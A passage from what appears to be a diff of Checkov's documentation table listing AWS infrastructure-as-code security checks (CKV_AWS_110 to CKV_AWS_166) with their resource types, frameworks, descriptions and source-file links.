+| 431 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 432 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 433 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 434 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 435 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) | +| 436 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 437 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 438 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 439 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 440 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | +| 441 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) | +| 442 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) | +| 443 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) | +| 444 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) | +| 445 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 446 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 447 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 448 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | +| 449 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | +| 450 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) | +| 451 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | +| 452 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | +| 453 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) | +| 454 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 455 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 456 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 457 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) | +| 458 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) | +| 459 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | +| 460 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | +| 461 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) | +| 462 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) | +| 463 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) | +| 464 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | +| 465 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | +| 466 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) | +| 467 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) | +| 468 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) | +| 469 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) | +| 470 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) | +| 471 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) | +| 472 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | +| 473 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | +| 474 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | +| 475 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | +| 476 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) | +| 477 | CKV_AWS_135 | resource | [?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 478 | CKV_AWS_135 | resource | [?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 479 | CKV_AWS_135 | resource | [].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 480 | CKV_AWS_135 | resource | [].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 481 | CKV_AWS_135 | resource | [].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 482 | CKV_AWS_135 | resource | [].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 483 | CKV_AWS_135 | resource | [].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 484 | CKV_AWS_135 | resource | [].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 485 | CKV_AWS_135 | resource | [].tasks[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 486 | CKV_AWS_135 | resource | [].tasks[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 487 | CKV_AWS_135 | resource | [].tasks[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 488 | CKV_AWS_135 | resource | [].tasks[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 489 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 490 | CKV_AWS_135 | resource | [].tasks[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 491 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"amazon.aws.ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 492 | CKV_AWS_135 | resource | [].tasks[].block[].block[].block[?"ec2_instance" != null][] | Ensure that EC2 is EBS optimized | Ansible | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/aws/EC2EBSOptimized.py) | +| 493 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) | +| 494 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) | +| 495 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) | +| 496 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | +| 497 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | +| 498 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) | +| 499 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) | +| 500 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) | +| 501 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) | +| 502 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) | +| 503 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) | +| 504 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | +| 505 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | +| 506 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | +| 507 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | +| 508 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) | +| 509 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) | +| 510 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) | +| 511 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) | +| 512 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) | +| 513 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | +| 514 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | +| 515 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | +| 516 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | +| 517 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) | +| 518 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) | +| 519 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) | +| 520 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | +| 521 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | +| 522 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | +| 523 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | +| 524 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) | +| 525 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) | +| 526 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | +| 527 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | +| 528 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) | +| 529 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) | +| 530 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) | +| 531 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) | +| 532 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) | +| 533 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) | +| 534 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) | +| 535 | CKV_AWS_163 | resource | AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) | +| 536 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) | +| 537 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) | +| 538 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) | +| 539 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) | +| 540 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) | +| 541 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | 